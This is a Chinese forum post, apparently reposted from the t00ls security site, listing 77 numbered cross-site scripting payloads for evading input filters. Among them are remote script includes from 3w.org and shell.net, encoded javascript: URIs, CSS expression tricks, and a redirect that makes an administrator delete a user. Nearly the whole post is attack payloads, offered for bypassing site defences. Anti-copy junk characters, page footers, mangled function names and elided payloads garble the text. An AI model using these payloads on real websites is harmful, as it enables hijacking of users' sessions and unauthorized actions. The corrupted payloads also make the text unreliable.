貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 e1 w" @, O" P; d1 Q* ~(1)普通的XSS JavaScript注入
" ~7 ]* p% Q s T! q: ~. k<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" [4 Y3 K1 d/ ?: ^' b/ T, X
(2)IMG标签XSS使用JavaScript命令' d! B8 l3 ~+ q9 p% F. W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. j9 P4 S. ^9 l+ _' V
(3)IMG标签无分号无引号
( D8 o+ k1 F5 c3 _+ d<IMG SRC=javascript:alert(‘XSS’)>' j: U; u) R4 w1 p/ s" |
(4)IMG标签大小写不敏感8 r3 f7 Q* b8 k3 c( r2 ?
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) v# @) t) o1 h+ h _0 h1 j
(5)HTML编码(必须有分号)
* n" Q' q7 N4 E h5 @. ]' J<IMG SRC=javascript:alert(“XSS”)>
' t( O7 D- z& h(6)修正缺陷IMG标签6 c; R) B: a \- D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ [( p5 ~' c! f% G) M- r7 }
$ F- x6 Q+ ?. |* O: G! h) c' J, r- u
(7)formCharCode标签(计算器)5 c% U. z) f0 X5 n
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9 ]- ~2 \6 g, o# _/ }0 E(8)UTF-8的Unicode编码(计算器)6 @7 x* ^: B4 T& |
<IMG SRC=jav..省略..S')>: z+ b. N4 T e: [; @; F
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)# Y# y0 b1 ?! w1 E" X
<IMG SRC=jav..省略..S')>0 Z7 h& X4 m7 R
(10)十六进制编码也是没有分号(计算器)
/ w6 _ v, |# q1 k9 L/ }3 K( P<IMG SRC=java..省略..XSS')>- e4 m, x' c' T. u0 L
(11)嵌入式标签,将Javascript分开& B% q4 Y4 a% g
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; \+ A) w) _0 W" g(12)嵌入式编码标签,将Javascript分开2 O5 C5 y( q5 r, ~' U# A _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 J2 g1 i% A' t6 @- l! J: J! x j2 R* G(13)嵌入式换行符
- { i5 J. }9 x- L/ X; ?<IMG SRC=”jav ascript:alert(‘XSS’);”>- C; x" H, I' S$ @. P* Q
(14)嵌入式回车
5 B! a& |, T% {5 X" k' v8 [<IMG SRC=”jav ascript:alert(‘XSS’);”>; u0 j' s" G9 Q- K/ i. v
(15)嵌入式多行注入JavaScript,这是XSS极端的例子! B. e I/ S3 t+ K ~
<IMG SRC=”javascript:alert(‘XSS‘)”>
3 B, { z. h8 H& b; Y0 u(16)解决限制字符(要求同页面)( `) U* E( y# m3 \0 c
<script>z=’document.’</script>
+ b3 d& t' P. W% ?4 w) q<script>z=z+’write(“‘</script>4 `9 G7 w- b1 ~, o- e3 f
<script>z=z+’<script’</script>2 m, Z9 t. K1 l6 F. A8 t! D
<script>z=z+’ src=ht’</script>
5 X- \3 h$ z$ |$ P<script>z=z+’tp://ww’</script>9 r- K6 L2 @- R, J |, M+ b
<script>z=z+’w.shell’</script>7 @ a }7 ~0 S/ m
<script>z=z+’.net/1.’</script>
7 K7 _% F1 Q( R5 O7 M' V! q<script>z=z+’js></sc’</script>5 G8 N' w! q+ _/ {
<script>z=z+’ript>”)’</script>. ]" p# w- m, A& q
<script>eval_r(z)</script>1 Z: h+ J0 k& r( i( y& c k7 X6 I
(17)空字符12-7-1 T00LS - Powered by Discuz! Board7 i1 |) b- C8 ^; e3 Y8 S. E
https://www.t00ls.net/viewthread ... table&tid=15267 2/61 |; b/ |0 g Z, x2 N/ o
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ x! X% ? a& v5 y/ d7 \(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( c# ~: i8 H/ _# {8 i( N, X* Zperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out g6 M9 u" `# u+ T# M$ [0 \
(19)Spaces和meta前的IMG标签
7 c8 g. I5 B9 Z6 x<IMG SRC=” javascript:alert(‘XSS’);”>
) c, p$ T$ {& O7 X- A4 b" _(20)Non-alpha-non-digit XSS
0 }/ G- y* \- A4 u* A<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 G8 E& w I, Q5 J% b$ f+ s$ I(21)Non-alpha-non-digit XSS to 2* v$ I+ `. f* ^' J; R
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 U0 K# G$ q* @2 V* a2 ?8 J7 L% i
(22)Non-alpha-non-digit XSS to 31 L$ {5 S" I- R6 X: u* D
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% K* N: A* Q$ O2 Y. g/ G0 `( I(23)双开括号
& L0 Z, E" N7 X<<SCRIPT>alert(“XSS”);//<</SCRIPT>
) ~8 x! |0 l }/ s+ k2 Y" F4 Y* v(24)无结束脚本标记(仅火狐等浏览器): w9 y/ e+ q8 e" D, K. a d/ q3 T
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>, B% R+ _, y7 t- |5 Q
(25)无结束脚本标记2) i, t# }! P/ d) U5 C+ Y
<SCRIPT SRC=//3w.org/XSS/xss.js> U1 F* \: f3 Q' F! J
(26)半开的HTML/JavaScript XSS3 ^( x1 F" B2 ~4 h3 I& z$ ^
<IMG SRC=”javascript:alert(‘XSS’)”
2 G$ I! c2 t; g0 Z(27)双开角括号
7 j V1 v/ u6 {$ C" s6 y! f<iframe src=http://3w.org/XSS.html <
2 q; A% o" w! `" a0 k(28)无单引号 双引号 分号1 b. T( O5 k5 L. y: d
<SCRIPT>a=/XSS/
& {4 X* A' t/ |+ u) Yalert(a.source)</SCRIPT>
7 G* h3 A3 W! u! o |(29)换码过滤的JavaScript2 Q4 x/ O+ M3 [( G' ~
\”;alert(‘XSS’);//( O( [1 R3 { |& P/ n3 P+ t- T t6 O! f
(30)结束Title标签1 Y3 ]; O, a- V9 g( g' P- n
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 U- r5 x% Q+ K5 \ w6 j(31)Input Image
9 H4 R3 K2 h0 m<INPUT SRC=”javascript:alert(‘XSS’);”>
9 W; |3 v9 r* n0 O7 C(32)BODY Image
, q! H0 _) y7 Y' d<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: B0 w: h* D/ a& H9 u. x
(33)BODY标签% a- t- J6 I- T5 C1 x$ `
<BODY(‘XSS’)>3 Y6 f+ C8 Q( F
(34)IMG Dynsrc5 {& H8 @5 f$ B+ z6 d& B! a
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 [: k+ f& U& V! w7 Q(35)IMG Lowsrc' w6 }# D9 p7 u; e( H- H n
<IMG LOWSRC=”javascript:alert(‘XSS’)”>( K$ [8 [! {2 q: W. Q( H
(36)BGSOUND
5 V' Q/ Z6 I% V* J, B0 }<BGSOUND SRC=”javascript:alert(‘XSS’);”>" n1 s! G l+ T3 ?& o3 m% x
(37)STYLE sheet
; F, s1 b/ T( H4 n* X; }8 ]<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 l0 O" `+ [$ Q, ~6 z+ P(38)远程样式表
9 U& R" |+ O( t$ {5 ~<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 O7 k- B! o8 G5 X( N
(39)List-style-image(列表式)
; D1 H1 X+ u: {2 }<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, d* x% c" s% k2 C7 V0 k(40)IMG VBscript
! x' K9 P' X) F+ ?* i& \<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS/ |) [% u ~7 t% V2 m
(41)META链接url
* G! ~7 n ~: |5 y: |9 B( |
: T) y$ u# \ c% k; A* c2 D P' N/ ]1 S
<META HTTP-EQUIV=”refresh” CONTENT=”0;$ {4 }" Q+ s; V3 ~7 M8 e
URL=http://;URL=javascript:alert(‘XSS’);”>
5 A; W9 o, {/ I(42)Iframe
) ^) n7 A4 l. F5 }<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; S0 X$ c3 j. f8 ](43)Frame7 N* _" l* y* R
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
7 o/ ^1 U4 ?1 V# X' vhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
* W% [7 Y/ I5 L* `( [(44)Table! k; ?2 s' v: P' n) z$ |
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, K B) a5 q. Q5 H& y2 N) H. x, t: K4 N
(45)TD
; w8 l! w5 k( m8 k9 C0 L _- f- g<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 F" l2 `( Y2 e(46)DIV background-image! g. q/ W! v5 N$ M5 L4 S4 y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- H( {5 a5 S2 H( ?# y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
( J4 m; J* i# ^- J! ]! A8&13&12288&65279)2 \' k3 }) ~7 e2 T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 {( K( C0 X) v+ X3 E(48)DIV expression
: A; Y6 u4 O, V- ~7 M" l6 @% N<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ e2 C. [7 U2 g4 h) w* \8 m7 c! q
(49)STYLE属性分拆表达
. i" T# t, s% |$ ^7 j% V5 X<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># ^4 V+ M. _( |5 g+ J& v5 D
(50)匿名STYLE(组成:开角号和一个字母开头)
% a( ?8 i% J" s5 O8 ]<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
2 T' Z2 \+ e$ q(51)STYLE background-image
6 d6 |- J- _! ^1 @, y" F<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A* V3 J* Z. z" d" k, O! D; _
CLASS=XSS></A>
) u$ v+ m) ]) i# W2 v, l8 [: S(52)IMG STYLE方式
) x2 F1 r. g5 uexppression(alert(“XSS”))’>
! j! _ B; ?4 D, p. b(53)STYLE background) G: e+ H7 z4 T: E
<STYLE><STYLE
5 Q- R) o4 N( f% t2 gtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>1 M8 d% M9 E$ `% M, @: i; B
(54)BASE
: W: ~3 R9 ]! |' J<BASE HREF=”javascript:alert(‘XSS’);//”>
, j K% ]' M% z/ S- c(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- Q; ?. _) F, ~$ ?: l
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
! \# t Z# s: ]2 X5 W% f* p, V(56)在flash中使用ActionScrpt可以混进你XSS的代码
. _: O: q6 l3 ]4 ]a=”get”;; p. ?$ x$ c6 f ^: `- j. B' A" s7 w
b=”URL(\”";+ n! q8 i( I' N; j8 I* J p6 }
c=”javascript:”;$ C" G6 Q |7 V1 @& ]
d=”alert(‘XSS’);\”)”; K6 [1 e( S i" q
eval_r(a+b+c+d);5 Y+ f7 T; a8 a+ p3 P
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上" d! v$ F) A# h9 d/ s! L: z
<HTML xmlns:xss>6 V$ Z3 L+ M @6 x8 S0 W
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># U; I& p1 O3 F& F ^3 e3 g
<xss:xss>XSS</xss:xss>3 s- o& @: [* J- T& W5 B3 ]" n% y
</HTML>3 T1 Y! R5 |" _, g9 }2 O; ]6 S: A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, n1 K" E2 R9 `0 Z2 h ~2 m<SCRIPT SRC=””></SCRIPT>
" Z" f0 m/ R, d& u) I(59)IMG嵌入式命令,可执行任意命令
- y9 {$ S5 e" W0 e<IMG SRC=”http://www.XXX.com/a.php?a=b”>6 W% O# N, b1 C' U
(60)IMG嵌入式命令(a.jpg在同服务器) B+ [, Y6 `: l. L
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. f- q, l% w; G# T) m
(61)绕符号过滤- g5 d8 A* i1 D8 J
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ V* e8 y& }$ P5 X/ o" U(62)
2 R1 P% r" n5 l) w1 b<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
" }5 `* V( f+ p(63)
1 n2 D9 i8 `. F. ?. m; {<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 J2 I$ J! m$ w& t5 M( G7 M
(64)4 t! h! N) E5 x$ }; D/ ]& o- r) A
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 b, O/ F, c6 i2 ?3 s3 V4 q(65)
0 S5 Y2 i0 r$ L! v. J; |' b<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> Z( |. f9 @/ `3 q; Z1 t F
(66)12-7-1 T00LS - Powered by Discuz! Board
1 G' p" k* O& C- U# ihttps://www.t00ls.net/viewthread ... table&tid=15267 4/6/ u5 |7 _* @% n6 q- v0 i
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 U" o; f8 [' G& @( U8 T! L& x(67)9 D8 G/ m( q F, }
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>9 G5 n+ Y$ {0 q
</SCRIPT>
& ^' V! a, m9 U5 o" `6 P9 A/ ~1 s(68)URL绕行
/ @3 ^% f E# n2 x q; ^- J<A HREF=”http://127.0.0.1/”>XSS</A>
9 o5 s* v3 u% I3 s, T0 z(69)URL编码
& B' m0 t5 P1 L<A HREF=”http://3w.org”>XSS</A>
1 y4 M1 j( C$ H. O1 S) ?, V(70)IP十进制
# u( E& p& v! _# A3 \5 j) A5 I<A HREF=”http://3232235521″>XSS</A>
: k9 s: i" }( ^- i/ f7 D ?2 d& U(71)IP十六进制
1 e# H$ I! ]' ]. B7 q# n7 P u, x5 ^2 M<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>) c8 ~: ]3 _+ ]$ \# _% k1 M8 E6 `$ b
(72)IP八进制
7 d* Y) N8 x) i( q% o% y<A HREF=”http://0300.0250.0000.0001″>XSS</A>; M [5 h8 X8 {0 O+ X
(73)混合编码
& ^8 j9 P) o3 ]# e' Y6 L; W+ E<A HREF=”h
. i7 `+ s: [5 d$ |tt p://6 6.000146.0×7.147/”">XSS</A>: P8 \# @" e* x! K0 Q2 g2 N4 j
(74)节省[http:]
5 J7 S& `3 w U2 C<A HREF=”//www.google.com/”>XSS</A>
; P( C' q6 v; D7 ?, I(75)节省[www]
+ T* g! `& b( W; {# ^& Y<A HREF=”http://google.com/”>XSS</A>
: r1 Y1 N {# n4 h& v' Y. e(76)绝对点绝对DNS
6 J. J, ]2 }( @$ y' D<A HREF=”http://www.google.com./”>XSS</A>' p& \; t/ e' ?+ z8 C) o
(77)javascript链接
( e( X3 Z% L) q( L6 x3 ]<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>6 D5 ^. _% \% F% X7 [* F
8 m" _& P* ~, x! `+ D$ D g
原文地址:http://fuzzexp.org/u/0day/?p=144 m; g" I; | Y$ H1 f- {
. r2 g) d6 e; p5 F |